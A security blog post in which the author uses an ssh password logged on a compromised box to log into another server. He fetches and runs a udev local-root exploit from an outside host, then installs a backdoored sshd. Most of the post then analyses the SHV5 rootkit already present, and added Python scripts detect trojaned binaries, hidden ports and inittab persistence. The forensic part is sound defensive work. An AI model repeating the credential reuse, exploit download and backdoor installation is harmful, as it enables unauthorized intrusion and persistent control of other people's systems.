A simple manual intrusion check on a compromised Linux box
by:vitter
blog:blog.securitycn.net
Today I noticed that someone on one of the compromised boxes had ssh-ed to another server, and the password had been logged.
[root@mail ~]# cat /tmp/sshpswd
ldc:sle823jfsGs@222.222.66.11
Just ssh straight in.
[root@mail ~]# ssh ldc@222.222.66.11
ldc@222.222.66.11's password:
Last login: Fri Jul 17 13:11:38 2009 from 221.140.140.200
[ldc@localhost ldc]$ cat /etc/issue
Red Hat Enterprise Linux Server release 5 (Tikanga)
Kernel \r on an \m
[ldc@localhost ldc]$ uname -a
Linux localhost.localdomain 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2007 i686 i686 i386 GNU/Linux
It is RHEL 5.0 with the kernel never upgraded, so the vmsplice local root should work. When I tried it, though, the machine hung, so I switched to the udev one, which worked.
[ldc@localhost ldc]$ mkdir .v
[ldc@localhost ldc]$ cd .v
[ldc@localhost .v]$ wget http://211.100.50.70/u.sh
--13:21:09-- http://211.100.50.70/u.sh
Connecting to 211.100.50.70:80... .. 200 OK
366 (3.3K) [application/x-sh]
Saving to: `u.sh'
100%[===========================================================================================>] 3,366 --.-K/s in 0.04s
13:21:09 (93.7 KB/s) - `u.sh' saved [3366/3366]
[ldc@localhost .v]$ ls
r00t r00t.c u.sh
[ldc@localhost .v]$ chmod +x u.sh
[ldc@localhost .v]$ cat /proc/net/netlink
sk Eth Pid Groups Rmem Wmem Dump Locks
f69f8800 0 2486 00000111 0 0 00000000 2
f7fdae00 0 0 00000000 0 0 00000000 2
c2132200 6 0 00000000 0 0 00000000 2
f6a57a00 7 2143 00000001 0 0 00000000 2
f7caf000 7 0 00000000 0 0 00000000 2
f6a0be00 9 2143 00000000 0 0 00000000 2
f6a61200 9 1996 00000000 0 0 00000000 2
f7de1c00 9 0 00000000 0 0 00000000 2
f7d6ca00 10 0 00000000 0 0 00000000 2
f7fb3200 11 0 00000000 0 0 00000000 2
c2154200 15 476 ffffffff 0 0 00000000 2
f7fdac00 15 0 00000000 0 0 00000000 2
f7fb3000 16 0 00000000 0 0 00000000 2
c21cde00 18 0 00000000 0 0 00000000 2
[ldc@localhost .v]$ ps aux | grep udev
root 477 0.0 0.0 2916 1396 ? S< 12:36 0:00 /sbin/udevd -d
ldc 3462 0.0 0.0 4128 680 pts/0 S 13:00 0:00 grep udev
[ldc@localhost .v]$ sh u.sh 476
suid.c:
suid.c:3:
sh-3.1# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=system_u:system_r:unconfined_t:SystemLow-SystemHigh
We have root now.
sh-3.1# w
13:25:18 up 48 min, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
ldc pts/0 100.204.107.20 13:05 0.00s 0.12s 0.06s sshd: ldc [priv]
sh-3.1# pwd
/home/ldc/.v
sh-3.1# ssh -V
OpenSSH_4.3p2, OpenSSL 0.9.8b 04 May 2006
First let's leave ourselves an ssh backdoor.
sh-3.1# wget http://211.100.50.70/openssh4.3p2.tar.gz
--13:32:08-- http://211.100.50.70/openssh4.3p2.tar.gz
Connecting to 211.100.50.70:80... 200 OK
79990 (957K) [application/x-gzip]
Saving to: `openssh4.3p2.tar.gz'
100%[===========================================================================================>] 979,990 1.14M/s in 0.8s
13:32:08 (1.14 MB/s) - `openssh4.3p2.tar.gz' saved [979990/979990]
sh-3.1# tar zxf openssh4.3p2.tar.gz
sh-3.1# cd openssh-4.3p2/
sh-3.1# ./configure --prefix=/usr --sysconfdir=/etc/ssh
checking for gcc... gcc
checking for C compiler default output file name... a.out
............ (several lines omitted)
sh-3.1# make && make install
conffile=`echo sshd_config.out | sed 's/.out$//'`; \
/bin/sed -e 's|/etc/ssh/ssh_prng_cmds|/etc/ssh/ssh_prng_cmds|g' -e
............ (several lines omitted)
sh-3.1# cp ssh_config sshd_config /etc/ssh/
sh-3.1# /etc/rc.d/init.d/sshd restart
STOP sshd [OK]
START sshd [OK]
OK, now log in through our sshdoor.
[root@localhost ~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=system_u:system_r:unconfined_t:SystemLow-SystemHigh
[root@localhost ~]# netstat -lntp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:2208 0.0.0.0:* LISTEN 2298/hpiod
tcp 0 0 0.0.0.0:1000 0.0.0.0:* LISTEN 2090/rpc.statd
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN 2056/portmap
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN 2883/vsftpd
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN 2315/cupsd
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN 2361/sendmail: acce
tcp 0 0 127.0.0.1:2207 0.0.0.0:* LISTEN 2303/python
This system feels strange: even port 22 is not shown, so netstat has probably been replaced. Let's first see whether other system files have been swapped out too.
[root@localhost ~]# rpm -qaV
S.5..UG. /bin/netstat
S.5..UG. /sbin/ifconfig
S.5....T /usr/bin/ssh-keygen
S.5....T c /etc/sysconfig/system-config-securitylevel
S.5..UG. /usr/sbin/lsof
.M...... /var/tux
S.5....T c /etc/inittab
S.5....T /usr/share/texmf-var/fonts/map/dvipdfm/updmap/dvipdfm_dl14.map
S.5....T /usr/share/texmf-var/fonts/map/dvipdfm/updmap/dvipdfm_ndl14.map
S.5....T /usr/share/texmf-var/fonts/map/pdftex/updmap/pdftex_dl14.map
S.5....T /usr/share/texmf-var/fonts/map/pdftex/updmap/pdftex_ndl14.map
S.5....T /usr/share/texmf-var/web2c/aleph.fmt
S.5....T /usr/share/texmf-var/web2c/amstex.fmt
S.5....T /usr/share/texmf-var/web2c/bamstex.fmt
S.5....T /usr/share/texmf-var/web2c/bplain.fmt
S.5....T /usr/share/texmf-var/web2c/cont-en.fmt
S.5....T /usr/share/texmf-var/web2c/etex.fmt
..5....T /usr/share/texmf-var/web2c/metafun.mem
S.5....T /usr/share/texmf-var/web2c/mf.base
..5....T /usr/share/texmf-var/web2c/mpost.mem
S.5....T /usr/share/texmf-var/web2c/mptopdf.fmt
S.5....T /usr/share/texmf-var/web2c/omega.fmt
S.5....T /usr/share/texmf-var/web2c/pdfetex.fmt
S.5....T /usr/share/texmf-var/web2c/pdftex.fmt
S.5....T /usr/share/texmf-var/web2c/tex.fmt
.......T c /etc/kdump.conf
S.5....T c /etc/printcap
..5....T c /etc/pki/nssdb/secmod.db
....L... c /etc/pam.d/system-auth
.M...... c /etc/cups/classes.conf
.......T c /etc/audit/auditd.conf
missing /usr/sbin/nscd
S.5....T c /etc/sysconfig/named
.M...... /var/named
SM5..UG. /bin/ps
SM5..UG. /usr/bin/top
SM5....T c /etc/sysconfig/iptables-config
S.5..UG. /usr/bin/find
prelink: /usr/lib/libGL.so.1.2.#prelink#.crFdQJ Could not trace symbol resolving
S.?..... /usr/lib/libGL.so.1.2
S.5....T c /etc/ppp/chap-secrets
S.5....T c /etc/ppp/pap-secrets
S.5....T c /etc/xml/catalog
S.5....T c /usr/share/sgml/docbook/xmlcatalog
S.5....T c /etc/ssh/ssh_config
S.5....T /usr/bin/scp
S.5....T /usr/bin/sftp
S.5....T /usr/bin/ssh
S.5....T /usr/bin/ssh-add
SM5...GT /usr/bin/ssh-agent
S.5....T /usr/bin/ssh-keyscan
S.5....T /usr/share/texmf-var/fonts/map/dvips/updmap/builtin35.map
S.5....T /usr/share/texmf-var/fonts/map/dvips/updmap/download35.map
S.5....T /usr/share/texmf-var/fonts/map/dvips/updmap/ps2pk.map
S.5....T /usr/share/texmf-var/fonts/map/dvips/updmap/psfonts_pk.map
S.5....T /usr/share/texmf-var/fonts/map/dvips/updmap/psfonts_t1.map
S.5....T /etc/sgml/docbook-slides.cat
S.5....T /usr/share/icons/hicolor/icon-theme.cache
S.5..UG. /bin/ls
S.5..UG. /usr/bin/dir
S.5..UG. /usr/bin/md5sum
S.5..UG. /usr/bin/pstree
S.5....T c /etc/syslog.conf
S.5....T c /etc/ssh/sshd_config
S.5....T /usr/sbin/sshd
missing /var/lib/texmf/ls-R
S.5....T /etc/sgml/docbook-simple.cat
S.5....T c /etc/vsftpd/vsftpd.conf
.M...... /var/ftp/pub
S.5....T c /etc/mailcap
......G. /var/cache/samba/winbindd_privileged
.......T c /etc/mail/sendmail.cf
SM5....T c /etc/mail/submit.cf
S.5....T c /var/log/mail/statistics
..5....T c /usr/lib/security/classpath.security
S.5....T c /etc/sane.d/dll.conf
Luckily rpm itself was not replaced. Quite a few system commands have been swapped out, though. Heh, someone from the trade is already here.
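Reading a long rpm -qaV listing like the one above by eye is error-prone, so here is an added example (not code from the original post) that parses rpm's verify-flag column and reports the entries a defender cares about: non-config files under the system binary and library directories whose digest or ownership no longer matches the package database, or that are missing. The sample input is constructed from the listing above.

```python
import re

# rpm -V flag columns in order: S size, M mode, 5 digest, D device, L symlink,
# U user, G group, T mtime, P capabilities (newer rpm); '.' unchanged, '?' untestable
FLAG_NAMES = "SM5DLUGTP"
SYSTEM_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/lib/", "/usr/lib/")
VERIFY_RE = re.compile(r"^([SM5DLUGTP.?]{8,9})\s+(?:([cdglr])\s+)?(/\S+)$")

# Constructed sample modelled on the post's rpm -qaV output (not the real output).
SAMPLE_RPM_VERIFY = """\
S.5..UG.    /bin/netstat
S.5..UG.    /sbin/ifconfig
S.5....T  c /etc/sysconfig/system-config-securitylevel
missing     /usr/sbin/nscd
SM5..UG.    /bin/ps
prelink: /usr/lib/libGL.so.1.2.#prelink#.crFdQJ Could not trace symbol resolving
S.?.....    /usr/lib/libGL.so.1.2
S.5....T  c /etc/ssh/sshd_config
S.5....T    /usr/sbin/sshd
"""

def parse_rpm_verify(text):
    """Yield (path, changed_flags, file_type); 'missing' lines get {'missing'}."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("prelink:"):
            continue  # prelink diagnostics carry no verify flags
        if line.startswith("missing "):
            parts = line.split()
            yield parts[-1], {"missing"}, (parts[1] if len(parts) == 3 else None)
            continue
        m = VERIFY_RE.match(line)
        if m:
            flags, ftype, path = m.groups()
            # a flag letter means that attribute differs from the package database
            changed = {n for n, ch in zip(FLAG_NAMES, flags) if ch not in ".?"}
            yield path, changed, ftype

def suspicious_binaries(text):
    """Sorted non-config paths under system dirs whose digest or ownership changed
    or that are missing; an mtime-only change ('T') is not enough by itself."""
    hits = []
    for path, changed, ftype in parse_rpm_verify(text):
        if ftype == "c" or not path.startswith(SYSTEM_DIRS):
            continue  # config files drift legitimately; /var, /usr/share etc. skipped
        if changed & {"5", "U", "G", "missing"}:
            hits.append(path)
    return sorted(hits)
```

On a live host feed it the output of rpm -qaV; note that rpm's own database and binary must be trusted for the result to mean anything, which is why the post checks that rpm was left alone first.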
Sorry, but I'm going to have to kick you off. Let's check things first. Obviously this system can't be trusted, so we start by putting trusted copies of the commands back:
[root@localhost bin]# cp -f /home/ldc/.v/dir /usr/bin/dir
cp: cannot remove `/usr/bin/dir': Operation not permitted
The i, a and u attributes have been set on it with chattr.
[root@localhost bin]# chattr -iau /usr/bin/dir
[root@localhost bin]# cp -f /home/ldc/.v/dir /usr/bin/dir
OK. Let's see what else there is:
[root@localhost chkrootkit-0.48]# lsattr /bin /sbin /usr/bin /usr/sbin /etc| grep -e -ia
s---ia------- /bin/ps
s---ia------- /bin/ls
s---ia------- /bin/netstat
s---ia------- /sbin/ifconfig
s---ia------- /sbin/ttymon
s---ia------- /sbin/ttyload
s---ia------- /usr/bin/top
s---ia------- /usr/bin/md5sum
s---ia------- /usr/bin/pstree.x11
s---ia------- /usr/bin/find
s---ia------- /usr/bin/dir
s---ia------- /usr/bin/pstree
s---ia------- /usr/sbin/lsof
s---ia------- /usr/sbin/ttyload
s---ia------- /etc/sh.conf
[root@localhost bin]# chattr -iau ps ls netstat
[root@localhost bin]# rm -rf ps ls netstat
[root@localhost bin]# rz
rz waiting to receive.
[root@localhost bin]# chmod +x ps ls netstat
[root@localhost bin]# chattr +iau ps ls netstat
Put /usr/sbin/lsof, /usr/bin/find and the rest back the same way.
Now look at the ports with netstat again:
[root@localhost bin]# netstat -lntp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:2208 0.0.0.0:* LISTEN 2298/hpiod
tcp 0 0 0.0.0.0:1000 0.0.0.0:* LISTEN 2090/rpc.statd
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN 2056/portmap
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN 2883/vsftpd
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN 2315/cupsd
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN 2361/sendmail: acce
tcp 0 0 0.0.0.0:65530 0.0.0.0:* LISTEN 2663/ttyload (something has turned up)
tcp 0 0 127.0.0.1:2207 0.0.0.0:* LISTEN 2303/python
tcp 0 0 :::22 :::* LISTEN 13935/sshd
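The trojaned netstat hid both port 65530 and port 22. An added check (not from the original post) for exactly this situation: read the kernel's own socket table in /proc/net/tcp and diff it against what the on-disk netstat prints, since a userland rootkit like this one patches the netstat binary but cannot rewrite what the kernel exposes in /proc. Both inputs below are constructed samples modelled on the listings in this post; on a live host you would pass in the contents of /proc/net/tcp (and tcp6) and the captured output of netstat -lntp.

```python
import re

LISTEN = "0A"  # value of the 'st' column in /proc/net/tcp for a listening socket

# Constructed samples modelled on the post: the kernel table still contains
# port 65530 (0xFFFA, inode 9895, the ttyload backdoor) and 22 (0x0016), while
# the trojaned netstat output omits both.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 0100007F:08A0 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 7211 1 f6b7c380 300 0 0 2 -1
   1: 00000000:FFFA 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 9895 1 f6b7c000 300 0 0 2 -1
   2: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 10431 1 f6b7d000 300 0 0 2 -1
   3: 0100007F:0019 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 7432 1 f6b7d380 300 0 0 2 -1
   4: 0100007F:08A0 0100007F:C3F2 01 00000000:00000000 00:00000000 00000000     0        0 11020 1 f6b7e000 20 4 30 10 -1
"""
SAMPLE_NETSTAT = """\
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:2208          0.0.0.0:*               LISTEN      2298/hpiod
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      2361/sendmail: acce
"""

def proc_listen_ports(proc_text):
    """Parse /proc/net/tcp or tcp6 text into {port: inode} for LISTEN sockets."""
    ports = {}
    for line in proc_text.splitlines()[1:]:  # first line is the column header
        cols = line.split()
        if len(cols) < 10 or cols[3] != LISTEN:
            continue
        # local_address is hex addr:port; for tcp6 the address part is 32 hex digits
        port = int(cols[1].rsplit(":", 1)[1], 16)
        ports[port] = int(cols[9])  # socket inode; /proc/<pid>/fd links to socket:[inode]
    return ports

NETSTAT_RE = re.compile(r"^tcp6?\s+\d+\s+\d+\s+\S+?:(\d+)\s+\S+\s+LISTEN\b")

def netstat_listen_ports(netstat_text):
    """Set of listening ports that a `netstat -lntp` listing admits to."""
    return {int(m.group(1)) for m in map(NETSTAT_RE.match, netstat_text.splitlines()) if m}

def hidden_ports(proc_text, netstat_text):
    """Sorted (port, inode) pairs the kernel reports as listening but netstat omits."""
    kernel = proc_listen_ports(proc_text)
    shown = netstat_listen_ports(netstat_text)
    return sorted((p, ino) for p, ino in kernel.items() if p not in shown)

if __name__ == "__main__":  # live use: open("/proc/net/tcp").read() plus captured netstat output
    print(hidden_ports(SAMPLE_PROC_NET_TCP, SAMPLE_NETSTAT))
```

The inode returned with each hidden port is the same number lsof prints for the socket (9895 in the post), so it can be matched against /proc/*/fd to find the owning process without trusting ps or lsof.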
Now run chkrootkit and rkhunter and see what they say:
[root@localhost .v]# ls
chkrootkit-0.48 chkrootkit.tar.gz rkhunter rkhunter-1.2.7.tar.gz
[root@localhost .v]# cd chkrootkit-0.48/
[root@localhost chkrootkit-0.48]# ./chkrootkit
ROOTDIR is `/'
Checking `amd'... not found
Checking `basename'... not infected
............ (several lines omitted)
Checking `ifconfig'... INFECTED
............ (several lines omitted)
Checking `pstree'... INFECTED
............ (several lines omitted)
Checking `top'... INFECTED
............ (several lines omitted)
Searching for t0rn's v8 defaults... Possible t0rn v8 \(or variation\) rootkit installed
............ (several lines omitted)
Searching for Showtee... Warning: Possible Showtee Rootkit installed
............ (several lines omitted)
Searching for Romanian rootkit... /usr/include/file.h /usr/include/proc.h
............ (several lines omitted)
Every one of the lines above indicates a problem.
Next, rkhunter; its log goes to /var/log/rkhunter.log:
[root@localhost rkhunter]# /usr/local/bin/rkhunter -c --createlogfile
Rootkit Hunter 1.2.7 is running
Determining OS... Unknown
Warning: This operating system is not fully supported!
Warning: Cannot find md5_not_known
All MD5 checks will be skipped! (because md5sum has been replaced)
............ (several lines omitted)
Rootkit 'SHV4'... [ Warning! ] (SHV4)
--------------------------------------------------------------------------------
Found parts of this rootkit/trojan by checking the default files and directories
Please inspect the available files, by running this check with the parameter
--createlogfile and check the log file (current file: /var/log/rkhunter.log).
--------------------------------------------------------------------------------
[Press <ENTER> to continue]
Rootkit 'SHV5'... [ Warning! ] (SHV5)
--------------------------------------------------------------------------------
Found parts of this rootkit/trojan by checking the default files and directories
Please inspect the available files, by running this check with the parameter
--createlogfile and check the log file (current file: /var/log/rkhunter.log).
--------------------------------------------------------------------------------
............ (several lines omitted)
Scanning took 84 seconds
Scan results written to logfile (/var/log/rkhunter.log)
------------------------------------------------------------------------
Do you have some problems, undetected rootkits, false positives, ideas
or suggestions?
Please e-mail me by filling in the contact form (@http://www.rootkit.nl)
------------------------------------------------------------------------
Now let's look at the log:
[root@localhost rkhunter]# cat /var/log/rkhunter.log
[15:16:51] Running Rootkit Hunter 1.2.7 on localhost.localdomain
[15:16:51]
Rootkit Hunter 1.2.7, Copyright 2003-2005, Michael Boelen
............ (several lines omitted)
[15:16:55] *** Start scan SHV4 ***
[15:16:55] - File /etc/ld.so.hash... OK. Not found.
[15:16:55] - File /lib/libext-2.so.7... OK. Not found.
[15:16:55] - File /lib/lidps1.so... WARNING! Exists. (one file found)
[15:16:55] - File /usr/sbin/xntps... OK. Not found.
[15:16:55] - Directory /lib/security/.config... OK. Not found.
[15:16:55] - Directory /lib/security/.config/ssh... OK. Not found.
[15:17:04] *** Start scan SHV5 ***
[15:17:04] - File /etc/sh.conf... WARNING! Exists. (one file found)
[15:17:04] - File /dev/srd0... OK. Not found.
[15:17:04] - Directory /usr/lib/libsh... WARNING! Exists. (one directory found)
............ (several lines omitted)
Next we verify by hand, because the tools only check for known rootkits; anything that has been modified they will not find.
[root@localhost sbin]# netstat -anp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:65530 0.0.0.0:* LISTEN 2663/ttyload
............ (several lines omitted)
raw 0 0 0.0.0.0:1 0.0.0.0:* 7 2679/ttymon
............ (several lines omitted)
Two abnormal entries found.
[root@localhost sbin]# ps aux|grep 2663
root 2663 0.0 0.0 2128 516 ? Ss 12:37 0:00 /sbin/ttyload -q (there's its real form)
root 15350 0.0 0.0 4088 604 pts/0 S+ 15:21 0:00 grep 2663
[root@localhost sbin]# lsof -p 2663
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
3 2663 root cwd DIR 253,0 4096 2 /
3 2663 root rtd DIR 253,0 4096 2 /
3 2663 root txt REG 253,0 652620 34897965 /tmp/sh-AQJ3OQYACSO (deleted) (it's a packed binary)
3 2663 root mem REG 253,0 121684 8586729 /lib/ld-2.5.so
3 2663 root mem REG 253,0 1576952 8586730 /lib/libc-2.5.so
3 2663 root mem REG 253,0 101036 8586743 /lib/libnsl-2.5.so
3 2663 root mem REG 253,0 15264 8586757 /lib/libutil-2.5.so
3 2663 root mem REG 253,0 27836 8585303 /lib/libcrypt-2.5.so
3 2663 root 0u CHR 1,3 1517 /dev/null
3 2663 root 1u CHR 1,3 1517 /dev/null
3 2663 root 2u CHR 1,3 1517 /dev/null
3 2663 root 3u IPv4 9895 TCP *:65530 (LISTEN)
[root@localhost sbin]# lsof -p 2679
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
ttymon 2679 root cwd DIR 253,0 4096 2 /
ttymon 2679 root rtd DIR 253,0 4096 2 /
ttymon 2679 root txt REG 253,0 93476 852119 /sbin/ttymon
ttymon 2679 root mem REG 253,0 46740 8585257 /lib/libnss_files-2.5.so
ttymon 2679 root mem REG 253,0 121684 8586729 /lib/ld-2.5.so
ttymon 2679 root mem REG 253,0 1576952 8586730 /lib/libc-2.5.so
ttymon 2679 root 3u raw 9925 00000000:0001->00000000:0000 st=07
The thing listening on port 65530 is an ssh backdoor:
[root@localhost sbin]# nc 127.0.0.1 65530
SSH-1.5-2.0.13
Protocol mismatch.
The password should be in:
[root@localhost sbin]# cat /etc/sh.conf
76800957735704ee3dd8ac42779db49a -
It's hashed, so let's look at the other configuration file:
[root@localhost sbin]# cat /lib/lidps1.so
ttyload
shsniff
shp
shsb
hide
burim
synscan
mirkforce
ttymon
sh2-power
Looks like this is the trojaned ps's configuration file.
Now the other process:
[root@localhost sbin]# strings /sbin/ttymon
............ (several lines omitted)
Usage: %s <dst> <src> <size> <number>
Ports are set to send and receive on port 179
dst: Destination Address
src: Source Address
size: Size of packet which should be no larger than 1024 should allow for xtra header info thru routes
num: packets
Could not resolve %s fucknut
Googling this, it should be a DoS tool. Those interested can compile it and take a look; it's here: http://www.securityfocus.com/archive/82/334848
OK, now let's go into the hacker's lair:
[root@localhost sbin]# cd /usr/lib/libsh
[root@localhost libsh]# ls -al
total 140
drwxr-xr-x 6 root root 4096 Dec 18 2008 .
drwxr-xr-x 118 root root 69632 Jul 17 13:55 ..
drwxr-xr-x 2 root root 4096 Dec 18 2008 .backup
-rwxr-xr-x 1 122 114 1206 Apr 18 2003 .bashrc
-rwxr-xr-x 1 122 114 2000 Nov 28 2006 hide
drwxr-xr-x 2 root root 4096 Dec 18 2008 .owned
-rwxr-xr-x 1 122 114 1345 Nov 28 2006 shsb
drwxr-xr-x 2 root root 4096 Jul 14 04:03 .sniff
drwxr-xr-x 2 gaobo gaobo 4096 Nov 28 2006 utilz
[root@localhost libsh]# ls .backup/
dir find ifconfig ls lsof md5sum netstat ps pstree top
Those are the backups of our system's original files; just restore them directly.
Use find to search for the other configuration files. That step is skipped here. In the end all of them were found:
[root@localhost libsh]# find / -nouser
/lib/libsh.so/shhk.pub
/lib/libsh.so/shhk
/lib/libsh.so/shrs
............ (several lines omitted)
[root@localhost libsh]# cd /lib/libsh.so/
[root@localhost libsh.so]# ls
bash shdcf shhk shhk.pub shrs
This directory holds the ssh backdoor's configuration files.
The rest can be found by keyword, e.g. find / -name "*" -exec grep -l "ttyload" {} \;
[root@localhost lib]# cat /usr/include/proc.h
3 burim
3 mirkforce
3 synscan
3 ttyload
3 shsniff
3 ttymon
3 shsb
3 shp
3 hide
4 ttyload
[root@localhost lib]# cat /usr/include/file.h
sh.conf
libsh
.sh
system
shsb
libsh.so
shp
shsniff
srd0
[root@localhost lib]# cat /usr/include/hosts.h
2 212.110
2 195.26
2 194.143
2 62.220
3 2002
4 2002
3 6667
4 6667
3 65530
4 65530
[root@localhost lib]# cat /usr/include/log.h
mirkforce
synscan
syslog
Now let's see how it gets started:
[root@localhost lib]# cat /etc/inittab
#
# inittab This file describes how the INIT process should set up
# the system in a certain run-level.
#
# Author: Miquel van Smoorenburg, <miquels@drinkel.nl.mugnet.org>
# Modified for RHS Linux by Marc Ewing and Donnie Barnes
#
# Default runlevel. The runlevels used by RHS are:
# 0 - halt (Do NOT set initdefault to this)
# 1 - Single user mode
# 2 - Multiuser, without NFS (The same as 3, if you do not have networking)
# 3 - Full multiuser mode
# 4 - unused
# 5 - X11
# 6 - reboot (Do NOT set initdefault to this)
#
id:5:initdefault:
# System initialization.
si::sysinit:/etc/rc.d/rc.sysinit
l0:0:wait:/etc/rc.d/rc 0
l1:1:wait:/etc/rc.d/rc 1
l2:2:wait:/etc/rc.d/rc 2
l3:3:wait:/etc/rc.d/rc 3
l4:4:wait:/etc/rc.d/rc 4
l5:5:wait:/etc/rc.d/rc 5
l6:6:wait:/etc/rc.d/rc 6
# Trap CTRL-ALT-DELETE
ca::ctrlaltdel:/sbin/shutdown -t3 -r now
# When our UPS tells us power has failed, assume we have a few minutes
# of power left. Schedule a shutdown for 2 minutes from now.
# This does, of course, assume you have powerd installed and your
# UPS connected and working correctly.
pf::powerfail:/sbin/shutdown -f -h +2 "Power Failure; System Shutting Down"
# If power was restored before the shutdown kicked in, cancel it.
pr:12345:powerokwait:/sbin/shutdown -c "Power Restored; Shutdown Cancelled"
# Run xdm in runlevel 5
x:5:respawn:/etc/X11/prefdm -nodaemon
# Loading standard ttys
0:2345:once:/usr/sbin/ttyload (here it is)
# Run gettys in standard runlevels
1:2345:respawn:/sbin/mingetty tty1
2:2345:respawn:/sbin/mingetty tty2
3:2345:respawn:/sbin/mingetty tty3
4:2345:respawn:/sbin/mingetty tty4
5:2345:respawn:/sbin/mingetty tty5
6:2345:respawn:/sbin/mingetty tty6
# modem getty.
# mo:235:respawn:/usr/sbin/mgetty -s 38400 modem
# fax getty (hylafax)
# mo:35:respawn:/usr/lib/fax/faxgetty /dev/modem
# vbox (voice box) getty
# I6:35:respawn:/usr/sbin/vboxgetty -d /dev/ttyI6
# I7:35:respawn:/usr/sbin/vboxgetty -d /dev/ttyI7
# end of /etc/inittab
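The rootkit's inittab entry is camouflaged: it uses the id 0 and sits under a "# Loading standard ttys" comment so that it reads like one more getty line. An added example (not from the original post) of checking /etc/inittab for persistence by comparing each command against a baseline of stock RHEL 5 entries; the baseline and the sample inittab below are constructed from the file shown above.

```python
# Constructed baseline: the commands of the stock RHEL 5 entries shown in the post.
STOCK_RHEL5_COMMANDS = {
    "/etc/rc.d/rc.sysinit", "/etc/rc.d/rc", "/sbin/shutdown",
    "/etc/X11/prefdm", "/sbin/mingetty",
}

# Constructed sample: a subset of the stock entries plus the rootkit's camouflaged line.
SAMPLE_INITTAB = """\
# Default runlevel.
id:5:initdefault:
si::sysinit:/etc/rc.d/rc.sysinit
l3:3:wait:/etc/rc.d/rc 3
ca::ctrlaltdel:/sbin/shutdown -t3 -r now
pf::powerfail:/sbin/shutdown -f -h +2 "Power Failure; System Shutting Down"
x:5:respawn:/etc/X11/prefdm -nodaemon
# Loading standard ttys
0:2345:once:/usr/sbin/ttyload
# Run gettys in standard runlevels
1:2345:respawn:/sbin/mingetty tty1
# mo:235:respawn:/usr/sbin/mgetty -s 38400 modem
"""

def parse_inittab(text):
    """Return (id, runlevels, action, process) tuples; comment and blank lines are skipped."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):  # inittab(5): lines beginning with '#' are ignored
            continue
        parts = line.split(":", 3)  # the process field may itself contain ':'
        if len(parts) == 4:
            entries.append(tuple(p.strip() for p in parts))
    return entries

def unexpected_commands(text, baseline=STOCK_RHEL5_COMMANDS):
    """Entries that run a command whose executable is not in the baseline.
    The id and the neighbouring comment are deliberately ignored, since the
    rootkit chooses both to look like a getty; only the command path counts."""
    hits = []
    for ident, levels, action, process in parse_inittab(text):
        if action in ("initdefault", "off") or not process:
            continue  # nothing is executed for these
        if process.split()[0] not in baseline:
            hits.append((ident, levels, action, process))
    return hits
```

A hit only says the command is not in the baseline; the next step, as in the post, is to read the flagged file (here /usr/sbin/ttyload, a two-line wrapper script) and verify it against the package database.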
Now its startup script:
[root@localhost lib]# cat /usr/sbin/ttyload
/sbin/ttyload -q >/dev/null 2>&1
/sbin/ttymon >/dev/null 2>&1
Beyond running the tools, the above was a simple manual analysis of the rootkit; this one was an unmodified SHV5. It is only meant as a set of ideas: every intrusion has to be analysed on its own terms, and this one was relatively simple.